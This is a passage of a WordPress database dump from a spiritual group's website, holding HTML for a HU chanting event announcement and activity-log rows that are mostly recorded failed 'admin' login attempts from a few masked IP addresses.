love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/286733007/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(220953,36661,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, Ancient Mantra and Sacred Sound.<br>\r\n</span></strong></span><span style=\"font-size: 18pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(220954,36661,'_message_key','post_updated'),(220955,36661,'_user_id','2'),(220956,36661,'_user_login','S8zhaBda'),(220957,36661,'_user_email','nada@zipnadanot.org'),(220958,36661,'_server_remote_addr','76.130.120.x'),(220959,36661,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269184&action=edit'),(220960,36662,'failed_username','admin'),(220961,36662,'server_http_user_agent','Mozilla/5.0'),(220962,36662,'_message_key','user_unknown_login_failed'),(220963,36662,'_server_remote_addr','45.136.118.x'),(220964,36663,'failed_username','admin'),(220965,36663,'server_http_user_agent','Mozilla/5.0'),(220966,36663,'_message_key','user_unknown_login_failed'),(220967,36663,'_server_remote_addr','74.249.245.x'),(220968,36664,'_user_id','2'),(220969,36664,'_user_login','S8zhaBda'),(220970,36664,'_user_email','nada@zipnadanot.org'),(220971,36664,'_message_key','user_logged_out'),(220972,36664,'_server_remote_addr','76.130.120.x'),(220973,36664,'_server_http_referer','https://eckankar-colorado.org/wp-admin/admin.php?page=boldgrid-backup'),(220974,36665,'failed_username','admin'),(220975,36665,'server_http_user_agent','Mozilla/5.0'),(220976,36665,'_message_key','user_unknown_login_failed'),(220977,36665,'_server_remote_addr','45.136.118.x'),(220978,36666,'failed_username','admin'),(220979,36666,'server_http_user_agent','Mozilla/5.0'),(220980,36666,'_message_key','user_unknown_login_failed'),(220981,36666,'_server_remote_addr','74.249.245.x'),(220982,36667,'failed_username','admin'),(220983,36667,'server_http_user_agent','Mozilla/5.0'),(220984,36667,'_message_key','user_unknown_login_failed'),(220985,36667,'_server_remote_addr','45.136.118.x'),(220986,36668,'failed_username','admin'),(220987,36668,'server_http_user_agent','Mozilla/5.0'),(220988,36668,'_message_key','user_unknown_login_failed'),(220989,36668,'_server_remote_addr','74.249.245.x'),(220990,36669,'failed_username','admin'),(220991,36669,'server_http_user_agent','Mozilla/5.0'),(220992,36669,'_message_key','user_unknown_login_failed'),(220993,36669,'_server_remote_addr','45.136.118.x'),(220994,36670,'failed_username','admin'),(220995,36670,'server_http_user_agent','Mozilla/5.0'),(220996,36670,'_message_key','user_unknown_login_failed'),(220997,36670,'_server_remote_addr','74.249.245.x'),(220998,36671,'failed_username','admin'),(220999,36671,'server_http_user_agent','Mozilla/5.0'),(221000,36671,'_message_key','user_unknown_login_failed'),(221001,36671,'_server_remote_addr','45.136.118.x'),(221002,36672,'failed_username','admin'),(221003,36672,'server_http_user_agent','Mozilla/5.0'),(221004,36672,'_message_key','user_unknown_login_failed'),(221005,36672,'_server_remote_addr','74.249.245.x'),(221006,36673,'failed_username','admin'),(221007,36673,'server_http_user_agent','Mozilla/5.0'),(221008,36673,'_message_key','user_unknown_login_failed'),(221009,36673,'_server_remote_addr','45.136.118.x'),(221010,36674,'failed_username','admin'),(221011,36674,'server_http_user_agent','Mozilla/5.0'),(221012,36674,'_message_key','user_unknown_login_failed'),(221013,36674,'_server_remote_addr','74.249.245.x'),(221014,36675,'failed_username','admin'),(221015,36675,'server_http_user_agent','Mozilla/5.0'),(221016,36675,'_message_key','user_unknown_login_failed'),(221017,36675,'_server_remote_addr','45.136.118.x'),(221018,36676,'failed_username','admin'),(221019,36676,'server_http_user_agent','Mozilla/5.0'),(221020,36676,'_message_key','user_unknown_login_failed'),(221021,36676,'_server_remote_addr','74.249.245.x'),(221022,36677,'failed_username','admin'),(221023,36677,'server_http_user_agent','Mozilla/5.0'),(221024,36677,'_message_key','user_unknown_login_failed'),(221025,36677,'_server_remote_addr','45.136.118.x'),(221026,36678,'failed_username','admin'),(221027,36678,'server_http_user_agent','Mozilla/5.0'),(221028,36678,'_message_key','user_unknown_login_failed'),(221029,36678,'_server_remote_addr','74.249.245.x'),(221030,36679,'failed_username','admin'),(221031,36679,'server_http_user_agent','Mozilla/5.0'),(221032,36679,'_message_key','user_unknown_login_failed'),(221033,36679,'_server_remote_addr','45.136.118.x'),(221034,36680,'failed_username','admin'),(221035,36680,'server_http_user_agent','Mozilla/5.0'),(221036,36680,'_message_key','user_unknown_login_failed'),(221037,36680,'_server_remote_addr','74.249.245.x'),(221038,36681,'failed_username','admin'),(221039,36681,'server_http_user_agent','Mozilla/5.0'),(221040,36681,'_message_key','user_unknown_login_failed'),(221041,36681,'_server_remote_addr','45.136.118.x'),(221042,36682,'failed_username','admin'),(221043,36682,'server_http_user_agent','Mozilla/5.0'),(221044,36682,'_message_key','user_unknown_login_failed'),(221045,36682,'_server_remote_addr','74.249.245.x'),(221046,36683,'failed_username','admin'),(221047,36683,'server_http_user_agent','Mozilla/5.0'),(221048,36683,'_message_key','user_unknown_login_failed'),(221049,36683,'_server_remote_addr','45.136.118.x'),(221050,36684,'failed_username','admin'),(221051,36684,'server_http_user_agent','Mozilla/5.0'),(221052,36684,'_message_key','user_unknown_login_failed'),(221053,36684,'_server_remote_addr','74.249.245.x'),(221054,36685,'failed_username','admin'),(221055,36685,'server_http_user_agent','Mozilla/5.0'),(221056,36685,'_message_key','user_unknown_login_failed'),(221057,36685,'_server_remote_addr','45.136.118.x'),(221058,36686,'failed_username','admin'),(221059,36686,'server_http_user_agent','Mozilla/5.0'),(221060,36686,'_message_key','user_unknown_login_failed'),(221061,36686,'_server_remote_addr','74.249.245.x'),(221062,36687,'failed_username','admin'),(221063,36687,'server_http_user_agent','Mozilla/5.0'),(221064,36687,'_message_key','user_unknown_login_failed'),(221065,36687,'_server_remote_addr','45.136.118.x'),(221066,36688,'failed_username','admin'),(221067,36688,'server_http_user_agent','Mozilla/5.0'),(221068,36688,'_message_key','user_unknown_login_failed'),(221069,36688,'_server_remote_addr','74.249.245.x'),(221070,36689,'failed_username','admin'),(221071,36689,'server_http_user_agent','Mozilla/5.0'),(221072,36689,'_message_key','user_unknown_login_failed'),(221073,36689,'_server_remote_addr','45.136.118.x'),(221074,36690,'failed_username','admin'),(221075,36690,'server_http_user_agent','Mozilla/5.0'),(221076,36690,'_message_key','user_unknown_login_failed'),(221077,36690,'_server_remote_addr','74.249.245.x'),(221078,36691,'failed_username','admin'),(221079,36691,'server_http_user_agent','Mozilla/5.0'),(221080,36691,'_message_key','user_unknown_login_failed'),(221081,36691,'_server_remote_addr','45.136.118.x'),(221082,36692,'failed_username','admin'),(221083,36692,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(221084,36692,'_message_key','user_unknown_login_failed'),(221085,36692,'_xmlrpc_request','true'),(221086,36692,'_server_remote_addr','20.150.196.x'),(221087,36693,'failed_username','admin'),(221088,36693,'server_http_user_agent','Mozilla/5.0'),(221089,36693,'_message_key','user_unknown_login_failed'),(221090,36693,'_server_remote_addr','74.249.245.x'),(221091,36694,'failed_username','admin'),(221092,36694,'server_http_user_agent','Mozilla/5.0'),(221093,36694,'_message_key','user_unknown_login_failed'),(221094,36694,'_server_remote_addr','45.136.118.x'),(221095,36695,'failed_username','admin'),(221096,36695,'server_http_user_agent','Mozilla/5.0'),(221097,36695,'_message_key','user_unknown_login_failed'),(221098,36695,'_server_remote_addr','74.249.245.x'),(221099,36696,'failed_username','admin'),(221100,36696,'server_http_user_agent','Mozilla/5.0'),(221101,36696,'_message_key','user_unknown_login_failed'),(221102,36696,'_server_remote_addr','45.136.118.x'),(221103,36697,'failed_username','admin'),(221104,36697,'server_http_user_agent','Mozilla/5.0'),(221105,36697,'_message_key','user_unknown_login_failed'),(221106,36697,'_server_remote_addr','74.249.245.x'),(221107,36698,'failed_username','admin'),(221108,36698,'server_http_user_agent','Mozilla/5.0'),(221109,36698,'_message_key','user_unknown_login_failed'),(221110,36698,'_server_remote_addr','45.136.118.x'),(221111,36699,'failed_username','admin'),(221112,36699,'server_http_user_agent','Mozilla/5.0'),(221113,36699,'_message_key','user_unknown_login_failed'),(221114,36699,'_server_remote_addr','74.249.245.x'),(221115,36700,'failed_username','admin'),(221116,36700,'server_http_user_agent','Mozilla/5.0'),(221117,36700,'_message_key','user_unknown_login_failed'),(221118,36700,'_server_remote_addr','45.136.118.x'),(221119,36701,'failed_username','admin'),(221120,36701,'server_http_user_agent','Mozilla/5.0'),(221121,36701,'_message_key','user_unknown_login_failed'),(221122,36701,'_server_remote_addr','74.249.245.x'),(221123,36702,'failed_username','admin'),(221124,36702,'server_http_user_agent','Mozilla/5.0'),(221125,36702,'_message_key','user_unknown_login_failed'),(221126,36702,'_server_remote_addr','45.136.118.x'),(221127,36703,'failed_username','admin'),(221128,36703,'server_http_user_agent','Mozilla/5.0'),(221129,36703,'_message_key','user_unknown_login_failed'),(221130,36703,'_server_remote_addr','74.249.245.x'),(221131,36704,'failed_username','admin'),(221132,36704,'server_http_user_agent','Mozilla/5.0'),(221133,36704,'_message_key','user_unknown_login_failed'),(221134,36704,'_server_remote_addr','45.136.118.x'),(221135,36705,'failed_username','admin'),(221136,36705,'server_http_user_agent','Mozilla/5.0'),(221137,36705,'_message_key','user_unknown_login_failed'),(221138,36705,'_server_remote_addr','74.249.245.x'),(221139,36706,'failed_username','admin'),(221140,36706,'server_http_user_agent','Mozilla/5.0'),(221141,36706,'_message_key','user_unknown_login_failed'),(221142,36706,'_server_remote_addr','45.136.118.x'),(221143,36707,'failed_username','admin'),(221144,36707,'server_http_user_agent','Mozilla/5.0'),(221145,36707,'_message_key','user_unknown_login_failed'),(221146,36707,'_server_remote_addr','74.249.245.x'),(221147,36708,'failed_username','admin'),(221148,36708,'server_http_user_agent','Mozilla/5.0'),(221149,36708,'_message_key','user_unknown_login_failed'),(221150,36708,'_server_remote_addr','45.136.118.x'),(221151,36709,'failed_username','admin'),(221152,36709,'server_http_user_agent','Mozilla/5.0'),(221153,36709,'_message_key','user_unknown_login_failed'),(221154,36709,'_server_remote_addr','74.249.245.x'),(221155,36710,'failed_username','admin'),(221156,36710,'server_http_user_agent','Mozilla/5.0'),(221157,36710,'_message_key','user_unknown_login_failed'),(221158,36710,'_server_remote_addr','45.136.118.x'),(221159,36711,'failed_username','admin'),(221160,36711,'server_http_user_agent','Mozilla/5.0'),(221161,36711,'_message_key','user_unknown_login_failed'),(221162,36711,'_server_remote_addr','74.249.245.x'),(221163,36712,'failed_username','admin'),(221164,36712,'server_http_user_agent','Mozilla/5.0'),(221165,36712,'_message_key','user_unknown_login_failed'),(221166,36712,'_server_remote_addr','45.136.118.x'),(221167,36713,'failed_username','admin'),(221168,36713,'server_http_user_agent','Mozilla/5.0'),(221169,36713,'_message_key','user_unknown_login_failed'),(221170,36713,'_server_remote_addr','74.249.245.x'),(221171,36714,'failed_username','admin'),(221172,36714,'server_http_user_agent','Mozilla/5.0'),(221173,36714,'_message_key','user_unknown_login_failed'),(221174,36714,'_server_remote_addr','45.136.118.x'),(221175,36715,'failed_username','admin'),(221176,36715,'server_http_user_agent','Mozilla/5.0'),(221177,36715,'_message_key','user_unknown_login_failed'),(221178,36715,'_server_remote_addr','74.249.245.x'),(221179,36716,'failed_username','admin'),(221180,36716,'server_http_user_agent','Mozilla/5.0'),(221181,36716,'_message_key','user_unknown_login_failed'),(221182,36716,'_server_remote_addr','45.136.118.x'),(221183,36717,'failed_username','admin'),(221184,36717,'server_http_user_agent','Mozilla/5.0'),(221185,36717,'_message_key','user_unknown_login_failed'),(221186,36717,'_server_remote_addr','74.249.245.x'),(221187,36718,'failed_username','admin'),(221188,36718,'server_http_user_agent','Mozilla/5.0'),(221189,36718,'_message_key','user_unknown_login_failed'),(221190,36718,'_server_remote_addr','45.136.118.x'),(221191,36719,'failed_username','admin'),(221192,36719,'server_http_user_agent','Mozilla/5.0'),(221193,36719,'_message_key','user_unknown_login_failed'),(221194,36719,'_server_remote_addr','74.249.245.x'),(221195,36720,'failed_username','admin'),(221196,36720,'server_http_user_agent','Mozilla/5.0'),(221197,36720,'_message_key','user_unknown_login_failed'),(221198,36720,'_server_remote_addr','45.136.118.x'),(221199,36721,'failed_username','admin'),(221200,36721,'server_http_user_agent','Mozilla/5.0'),(221201,36721,'_message_key','user_unknown_login_failed'),(221202,36721,'_server_remote_addr','74.249.245.x'),(221203,36722,'failed_username','admin'),(221204,36722,'server_http_user_agent','Mozilla/5.0'),(221205,36722,'_message_key','user_unknown_login_failed'),(221206,36722,'_server_remote_addr','74.249.245.x'),(221207,36723,'failed_username','admin'),(221208,36723,'server_http_user_agent','Mozilla/5.0'),(221209,36723,'_message_key','user_unknown_login_failed'),(221210,36723,'_server_remote_addr','45.136.118.x'),(221211,36724,'failed_username','admin'),(221212,36724,'server_http_user_agent','Mozilla/5.0'),(221213,36724,'_message_key','user_unknown_login_failed'),(221214,36724,'_server_remote_addr','74.249.245.x'),(221215,36725,'failed_username','admin'),(221216,36725,'server_http_user_agent','Mozilla/5.0'),(221217,36725,'_message_key','user_unknown_login_failed'),(221218,36725,'_server_remote_addr','45.136.118.x'),(221219,36726,'failed_username','admin'),(221220,36726,'server_http_user_agent','Mozilla/5.0'),(221221,36726,'_message_key','user_unknown_login_failed'),(221222,36726,'_server_remote_addr','74.249.245.x'),(221223,36727,'failed_username','admin'),(221224,36727,'server_http_user_agent','Mozilla/5.0'),(221225,36727,'_message_key','user_unknown_login_failed'),(221226,36727,'_server_remote_addr','45.136.118.x'),(221227,36728,'failed_username','admin'),(221228,36728,'server_http_user_agent','Mozilla/5.0'),(221229,36728,'_message_key','user_unknown_login_failed'),(221230,36728,'_server_remote_addr','74.249.245.x'),(221231,36729,'failed_username','admin'),(221232,36729,'server_http_user_agent','Mozilla/5.0'),(221233,36729,'_message_key','user_unknown_login_failed'),(221234,36729,'_server_remote_addr','45.136.118.x'),(221235,36730,'failed_username','admin'),(221236,36730,'server_http_user_agent','Mozilla/5.0'),(221237,36730,'_message_key','user_unknown_login_failed'),(221238,36730,'_server_remote_addr','74.249.245.x'),(221239,36731,'failed_username','admin'),(221240,36731,'server_http_user_agent','Mozilla/5.0'),(221241,36731,'_message_key','user_unknown_login_failed'),(221242,36731,'_server_remote_addr','45.136.118.x'),(221243,36732,'failed_username','admin'),(221244,36732,'server_http_user_agent','Mozilla/5.0'),(221245,36732,'_message_key','user_unknown_login_failed'),(221246,36732,'_server_remote_addr','74.249.245.x'),(221247,36733,'failed_username','admin'),(221248,36733,'server_http_user_agent','Mozilla/5.0'),(221249,36733,'_message_key','user_unknown_login_failed'),(221250,36733,'_server_remote_addr','45.136.118.x'),(221251,36734,'failed_username','admin'),(221252,36734,'server_http_user_agent','Mozilla/5.0'),(221253,36734,'_message_key','user_unknown_login_failed'),(221254,36734,'_server_remote_addr','74.249.245.x'),(221255,36735,'failed_username','admin'),(221256,36735,'server_http_user_agent','Mozilla/5.0'),(221257,36735,'_message_key','user_unknown_login_failed'),(221258,36735,'_server_remote_addr','45.136.118.x'),(221259,36736,'failed_username','admin'),(221260,36736,'server_http_user_agent','Mozilla/5.0'),(221261,36736,'_message_key','user_unknown_login_failed'),(221262,36736,'_server_remote_addr','74.249.245.x'),(221263,36737,'failed_username','admin'),(221264,36737,'server_http_user_agent','Mozilla/5.0'),(221265,36737,'_message_key','user_unknown_login_failed'),(221266,36737,'_server_remote_addr','45.136.118.x'),(221267,36738,'failed_username','admin'),(221268,36738,'server_http_user_agent','Mozilla/5.0'),(221269,36738,'_message_key','user_unknown_login_failed'),(221270,36738,'_server_remote_addr','74.249.245.x'),(221271,36739,'failed_username','admin'),(221272,36739,'server_http_user_agent','Mozilla/5.0'),(221273,36739,'_message_key','user_unknown_login_failed'),(221274,36739,'_server_remote_addr','45.136.118.x'),(221275,36740,'failed_username','admin'),(221276,36740,'server_http_user_agent','Mozilla/5.0'),(221277,36740,'_message_key','user_unknown_login_failed'),(221278,36740,'_server_remote_addr','74.249.245.x'),(221279,36741,'failed_username','admin'),(221280,36741,'server_http_user_agent','Mozilla/5.0'),(221281,36741,'_message_key','user_unknown_login_failed'),(221282,36741,'_server_remote_addr','45.136.118.x'),(221283,36742,'failed_username','admin'),(221284,36742,'server_http_user_agent','Mozilla/5.0'),(221285,36742,'_message_key','user_unknown_login_failed'),(221286,36742,'_server_remote_addr','74.249.245.x'),(221287,36743,'failed_username','admin'),(221288,36743,'server_http_user_agent','Mozilla/5.0'),(221289,36743,'_message_key','user_unknown_login_failed'),(221290,36743,'_server_remote_addr','45.136.118.x'),(221291,36744,'failed_username','admin'),(221292,36744,'server_http_user_agent','Mozilla/5.0'),(221293,36744,'_message_key','user_unknown_login_failed'),(221294,36744,'_server_remote_addr','74.249.245.x'),(221295,36745,'failed_username','admin'),(221296,36745,'server_http_user_agent','Mozilla/5.0'),(221297,36745,'_message_key','user_unknown_login_failed'),(221298,36745,'_server_remote_addr','45.136.118.x'),(221299,36746,'failed_username','admin'),(221300,36746,'server_http_user_agent','Mozilla/5.0'),(221301,36746,'_message_key','user_unknown_login_failed'),(221302,36746,'_server_remote_addr','74.249.245.x'),(221303,36747,'failed_username','admin'),(221304,36747,'server_http_user_agent','Mozilla/5.0'),(221305,36747,'_message_key','user_unknown_login_failed'),(221306,36747,'_server_remote_addr','45.136.118.x'),(221307,36748,'failed_username','admin'),(221308,36748,'server_http_user_agent','Mozilla/5.0'),(221309,36748,'_message_key','user_unknown_login_failed'),(221310,36748,'_server_remote_addr','74.249.245.x'),(221311,36749,'failed_username','admin'),(221312,36749,'server_http_user_agent','Mozilla/5.0'),(221313,36749,'_message_key','user_unknown_login_failed'),(221314,36749,'_server_remote_addr','45.136.118.x'),(221315,36750,'failed_username','admin'),(221316,36750,'server_http_user_agent','Mozilla/5.0'),(221317,36750,'_message_key','user_unknown_login_failed'),(221318,36750,'_server_remote_addr','74.249.245.x'),(221319,36751,'failed_username','admin'),(221320,36751,'server_http_user_agent','Mozilla/5.0'),(221321,36751,'_message_key','user_unknown_login_failed'),(221322,36751,'_server_remote_addr','45.136.118.x'),(221323,36752,'failed_username','admin'),(221324,36752,'server_http_user_agent','Mozilla/5.0'),(221325,36752,'_message_key','user_unknown_login_failed'),(221326,36752,'_server_remote_addr','74.249.245.x'),(221327,36753,'failed_username','admin'),(221328,36753,'server_http_user_agent','Mozilla/5.0'),(221329,36753,'_message_key','user_unknown_login_failed'),(221330,36753,'_server_remote_addr','45.136.118.x'),(221331,36754,'failed_username','admin'),(221332,36754,'server_http_user_agent','Mozilla/5.0'),(221333,36754,'_message_key','user_unknown_login_failed'),(221334,36754,'_server_remote_addr','74.249.245.x'),(221335,36755,'failed_username','admin'),(221336,36755,'server_http_user_agent','Mozilla/5.0'),(221337,36755,'_message_key','user_unknown_login_failed'),(221338,36755,'_server_remote_addr','45.136.118.x'),(221339,36756,'failed_username','admin'),(221340,36756,'server_http_user_agent','Mozilla/5.0'),(221341,36756,'_message_key','user_unknown_login_failed'),(221342,36756,'_server_remote_addr','74.249.245.x'),(221343,36757,'failed_username','admin'),(221344,36757,'server_http_user_agent','Mozilla/5.0'),(221345,36757,'_message_key','user_unknown_login_failed'),(221346,36757,'_server_remote_addr','45.136.118.x'),(221347,36758,'failed_username','admin'),(221348,36758,'server_http_user_agent','Mozilla/5.0'),(221349,36758,'_message_key','user_unknown_login_failed'),(221350,36758,'_server_remote_addr','74.249.245.x'),(221351,36759,'failed_username','admin'),(221352,36759,'server_http_user_agent','Mozilla/5.0'),(221353,36759,'_message_key','user_unknown_login_failed'),(221354,36759,'_server_remote_addr','45.136.118.x'),(221355,36760,'failed_username','admin'),(221356,36760,'server_http_user_agent','Mozilla/5.0'),(221357,36760,'_message_key','user_unknown_login_failed'),(221358,36760,'_server_remote_addr','74.249.245.x'),(221359,36761,'failed_username','admin'),(221360,36761,'server_http_user_agent','Mozilla/5.0'),(221361,36761,'_message_key','user_unknown_login_failed'),(221362,36761,'_server_remote_addr','45.136.118.x'),(221363,36762,'failed_username','admin'),(221364,36762,'server_http_user_agent','Mozilla/5.0'),(221365,36762,'_message_key','user_unknown_login_failed'),(221366,36762,'_server_remote_addr','74.249.245.x'),(221367,36763,'failed_username','admin'),(221368,36763,'server_http_user_agent','Mozilla/5.0'),(221369,36763,'_message_key','user_unknown_login_failed'),(221370,36763,'_server_remote_addr','45.136.118.x'),(221371,36764,'failed_username','admin'),(221372,36764,'server_http_user_agent','Mozilla/5.0'),(221373,36764,'_message_key','user_unknown_login_failed'),(221374,36764,'_server_remote_addr','74.249.245.x'),(221375,36765,'failed_username','admin'),(221376,36765,'server_http_user_agent','Mozilla/5.0'),(221377,36765,'_message_key','user_unknown_login_failed'),(221378,36765,'_server_remote_addr','45.136.118.x'),(221379,36766,'failed_username','admin'),(221380,36766,'server_http_user_agent','Mozilla/5.0'),(221381,36766,'_message_key','user_unknown_login_failed'),(221382,36766,'_server_remote_addr','74.249.245.x'),(221383,36767,'post_id','269186'),(221384,36767,'post_type','nf_sub'),(221385,36767,'post_title',''),(221386,36767,'_message_key','post_updated'),(221387,36767,'_server_remote_addr','67.161.136.x'),(221388,36767,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(221389,36768,'post_id','269187'),(221390,36768,'post_type','nf_sub'),(221391,36768,'post_title',''),(221392,36768,'_message_key','post_updated'),(221393,36768,'_server_remote_addr','67.161.136.x'),(221394,36768,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(221395,36769,'failed_username','admin'),(221396,36769,'server_http_user_agent','Mozilla/5.0'),(221397,36769,'_message_key','user_unknown_login_failed'),(221398,36769,'_server_remote_addr','45.136.118.x'),(221399,36770,'failed_username','admin'),(221400,36770,'server_http_user_agent','Mozilla/5.0'),(221401,36770,'_message_key','user_unknown_login_failed'),(221402,36770,'_server_remote_addr','74.249.245.x'),(221403,36771,'failed_username','admin'),(221404,36771,'server_http_user_agent','Mozilla/5.0'),(221405,36771,'_message_key','user_unknown_login_failed'),(221406,36771,'_server_remote_addr','45.136.118.x'),(221407,36772,'plugin_name','Responsive Accordion And Collapse'),(221408,36772,'plugin_current_version','2.4.4'),(221409,36772,'plugin_new_version','2.4.5'),(221410,36772,'_message_key','plugin_update_available'),(221411,36772,'_server_remote_addr','173.231.231.x'),(221412,36773,'failed_username','admin'),(221413,36773,'server_http_user_agent','Mozilla/5.0'),(221414,36773,'_message_key','user_unknown_login_failed'),(221415,36773,'_server_remote_addr','74.249.245.x'),(221416,36774,'failed_username','admin'),(221417,36774,'server_http_user_agent','Mozilla/5.0'),(221418,36774,'_message_key','user_unknown_login_failed'),(221419,36774,'_server_remote_addr','45.136.118.x'),(221420,36775,'failed_username','admin'),(221421,36775,'server_http_user_agent','Mozilla/5.0'),(221422,36775,'_message_key','user_unknown_login_failed'),(221423,36775,'_server_remote_addr','74.249.245.x'),(221424,36776,'failed_username','admin'),(221425,36776,'server_http_user_agent','Mozilla/5.0'),(221426,36776,'_message_key','user_unknown_login_failed'),(221427,36776,'_server_remote_addr','45.136.118.x'),(221428,36777,'failed_username','admin'),(221429,36777,'server_http_user_agent','Mozilla/5.0'),(221430,36777,'_message_key','user_unknown_login_failed'),(221431,36777,'_server_remote_addr','74.249.245.x'),(221432,36778,'failed_username','admin'),(221433,36778,'server_http_user_agent','Mozilla/5.0'),(221434,36778,'_message_key','user_unknown_login_failed'),(221435,36778,'_server_remote_addr','45.136.118.x'),(221436,36779,'failed_username','admin'),(221437,36779,'server_http_user_agent','Mozilla/5.0'),(221438,36779,'_message_key','user_unknown_login_failed'),(221439,36779,'_server_remote_addr','74.249.245.x'),(221440,36780,'failed_username','admin'),(221441,36780,'server_http_user_agent','Mozilla/5.0'),(221442,36780,'_message_key','user_unknown_login_failed'),(221443,36780,'_server_remote_addr','45.136.118.x'),(221444,36781,'failed_username','admin'),(221445,36781,'server_http_user_agent','Mozilla/5.0'),(221446,36781,'_message_key','user_unknown_login_failed'),(221447,36781,'_server_remote_addr','74.249.245.x'),(221448,36782,'failed_username','admin'),(221449,36782,'server_http_user_agent','Mozilla/5.0'),(221450,36782,'_message_key','user_unknown_login_failed'),(221451,36782,'_server_remote_addr','45.136.118.x'),(221452,36783,'failed_username','admin'),(221453,36783,'server_http_user_agent','Mozilla/5.0'),(221454,36783,'_message_key','user_unknown_login_failed'),(221455,36783,'_server_remote_addr','74.249.245.x'),(221456,36784,'failed_username','admin'),(221457,36784,'server_http_user_agent','Mozilla/5.0'),(221458,36784,'_message_key','user_unknown_login_failed'),(221459,36784,'_server_remote_addr','45.136.118.x'),(221460,36785,'failed_username','admin'),(221461,36785,'server_http_user_agent','Mozilla/5.0'),(221462,36785,'_message_key','user_unknown_login_failed'),(221463,36785,'_server_remote_addr','74.249.245.x'),(221464,36786,'failed_username','admin'),(221465,36786,'server_http_user_agent','Mozilla/5.0'),(221466,36786,'_message_key','user_unknown_login_failed'),(221467,36786,'_server_remote_addr','45.136.118.x'),(221468,36787,'failed_username','admin'),(221469,36787,'server_http_user_agent','Mozilla/5.0'),(221470,36787,'_message_key','user_unknown_login_failed'),(221471,36787,'_server_remote_addr','74.249.245.x'),(221472,36788,'failed_username','admin'),(221473,36788,'server_http_user_agent','Mozilla/5.0'),(221474,36788,'_message_key','user_unknown_login_failed'),(221475,36788,'_server_remote_addr','45.136.118.x'),(221476,36789,'failed_username','admin'),(221477,36789,'server_http_user_agent','Mozilla/5.0'),(221478,36789,'_message_key','user_unknown_login_failed'),(221479,36789,'_server_remote_addr','74.249.245.x'),(221480,36790,'failed_username','admin'),(221481,36790,'server_http_user_agent','Mozilla/5.0'),(221482,36790,'_message_key','user_unknown_login_failed'),(221483,36790,'_server_remote_addr','45.136.118.x'),(221484,36791,'failed_username','admin'),(221485,36791,'server_http_user_agent','Mozilla/5.0'),(221486,36791,'_message_key','user_unknown_login_failed'),(221487,36791,'_server_remote_addr','74.249.245.x'),(221488,36792,'failed_username','admin'),(221489,36792,'server_http_user_agent','Mozilla/5.0'),(221490,36792,'_message_key','user_unknown_login_failed'),(221491,36792,'_server_remote_addr','45.136.118.x'),(221492,36793,'failed_username','admin'),(221493,36793,'server_http_user_agent','Mozilla/5.0'),(221494,36793,'_message_key','user_unknown_login_failed'),(221495,36793,'_server_remote_addr','74.249.245.x'),(221496,36794,'failed_username','admin'),(221497,36794,'server_http_user_agent','Mozilla/5.0'),(221498,36794,'_message_key','user_unknown_login_failed'),(221499,36794,'_server_remote_addr','45.136.118.x'),(221500,36795,'failed_username','admin'),(221501,36795,'server_http_user_agent','Mozilla/5.0'),(221502,36795,'_message_key','user_unknown_login_failed'),(221503,36795,'_server_remote_addr','74.249.245.x'),(221504,36796,'failed_username','admin'),(221505,36796,'server_http_user_agent','Mozilla/5.0'),(221506,36796,'_message_key','user_unknown_login_failed'),(221507,36796,'_server_remote_addr','45.136.118.x'),(221508,36797,'failed_username','admin'),(221509,36797,'server_http_user_agent','Mozilla/5.0'),(221510,36797,'_message_key','user_unknown_login_failed'),(221511,36797,'_server_remote_addr','74.249.245.x'),(221512,36798,'failed_username','admin'),(221513,36798,'server_http_user_agent','Mozilla/5.0'),(221514,36798,'_message_key','user_unknown_login_failed'),(221515,36798,'_server_remote_addr','45.136.118.x'),(221516,36799,'failed_username','admin'),(221517,36799,'server_http_user_agent','Mozilla/5.0'),(221518,36799,'_message_key','user_unknown_login_failed'),(221519,36799,'_server_remote_addr','45.136.118.x'),(221520,36800,'failed_username','admin'),(221521,36800,'server_h